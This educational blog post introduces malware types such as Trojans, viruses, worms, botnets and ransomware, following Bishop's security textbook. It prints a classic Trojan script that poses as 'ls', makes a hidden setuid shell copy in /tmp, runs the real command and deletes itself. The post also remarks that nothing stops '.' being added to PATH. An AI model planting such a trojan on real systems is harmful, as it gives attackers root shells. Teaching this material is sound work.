RandomWalk

Hello, there!


Contact me

Email id-rahulr@iitk.ac.in show

Gentle Introduction to Malicious Software or Malware

15 Jan 2020 » security

Definition


Malicious logic, more commonly called malware, is a set of instructions that cause a site’s security policy to be violated.1

Malware is the swiss-army knife of cyber criminals and any other adversary to your corporation or organization2. In earlier days, when UNIX systems were popular, the hackers found a new way to get access to victims machine with a little piece of malicious code like the one below

#! /bin/sh 

# make a privileged, hidden copy of the shell (command interpreter) 
cp /bin/sh /tmp/.xxsh 
chmod o+s, w+x /tmp/.xxsh

# do what the victim thinks is *all* you’re doing 
ls $* 

# delete this file 
rm ./ls

When this file is saved with the file name ‘ls’ is victim’s home directory, and if the root user in victim’s machine executes ‘ls’ command, above script will run and it creates a copy of the shell in /tmp/ directory with the root previleges. Above script also deletes the file and thus leaves no trail. Now the copy of shell can be used for all non-sensible things by the hacker.

But, this trick won’t work anymore as the current directory ‘.’ is not in the system path variable by default in any latest LINUX systems. But nothing stops you from adding ‘.’ into the $PATH variable.


Types of malwares and its definitions


Further in this post, let’s see the various types of malware and its formal definitions

  1. A Trojan horse is a program with an overt (documented or known) purpose and a covert (undocumented or unexpected) purpose. A Trojan horse is a program with an overt (documented or known) purpose and a covert (undocumented or unexpected) purpose. A rootkit is a pernicious trojan hourse. It hides in the system and can avoid detection. A trojan hourse can be a propagating one as well.

  2. A computer virus is a program that inserts (a possibly transformed version of) itself into one or more files and then performs some (possibly null) action.
    • A boot sector infector is a virus that inserts itself into the boot sector of a disk. Eg. Brain Virus of IBM Machine.
    • An executable infector is a virus that infects executable programs. Eg. Jerusalem Virus (Also called Israeli Virus).
    • A multipartite virus is one that can infect both boot sectors and applications.
    • A macro virus is a virus composed of a sequence of instructions that is interpreted, rather than executed directly. Eg. Melissa Virus of MSWord97/98 docs.
    • A terminate and stay resident (TSR) virus is one that stays active (resident) in memory after the application, bootstrapping, or macro interpretation has terminated.
    • Stealth viruses are viruses that conceal the infection of files.
    • An encrypted virus is a virus that encrypts all of the virus except the cryptographic key and a decryption key.
    • A metamorphic virus is a virus that changes its internal structure but performs the same actions each time it is executed. Eg. Zmist(W95)
  3. A computer worm is a program that copies itself from one computer to another. Eg. Stuxnet worm, the Internet Worm, etc.

  4. A bot is malware that carries out some action in coordination with other bots. The attacker, called a botmaster, controls the bots from one or more systems called command and control (C&C) servers or motherships. They communicate over paths called C&C channels. A collection of bots is a botnet. Eg. Torpig, GTBot, etc.
    • Botnet developers discovered how to use this to increase the difficulty of locating bots, especially those used as botmasters. The idea is to associate a list of IP addresses with a particular host name. The binding between the host name and the IP address changes rapidly, with the next IP address selected from that list. These botnets are called IP flux botnets
  5. A bacterium or a rabbit is a program that absorbs all of some class of resource.

  6. A logic bomb is a program that performs an action that violates the security policy when some external event occurs.

  7. Adware is a Trojan horse that gathers information for marketing purposes and displays advertisements, often based on the gathered information.

  8. Spyware is a Trojan horse that records information about the use of a computer, usually resulting in confidential information such as keystrokes, passwords, credit card numbers, and visits to web sites. The information may be transmitted to a third party, stored for later transmission, or stored for retrieval by a third party. Eg. Pegasus

  9. Ransomware is malware that inhibits the use of resources until a ransom, usually monetary, is paid. Eg. Wannacry, CryptoLocker, etc.

Today’s malware is combination of various types of above mentioned ones and detecting whether a program is malware or not is undecidable as per Rice’s Theorem.3. And the sheer number of various malware made it impractical to design a rule based system to classify them as malware as best as possible. Solution to this mess is Machine Learning based detection methods. However, the best method also doesn’t guarantee that perfect classification. The aim is to reduce the false positives and false negetives in a machine learning based model for classification of malware.

More work related to ML based malware analysis will be discussed in future blogs.


References:


  1. Computer Security - Arts and Science, Matt Bishop (Ch23 of 2nd Edition) 

  2. https://cuckoosandbox.org 

  3. https://en.wikipedia.org/wiki/Rice%27s_theorem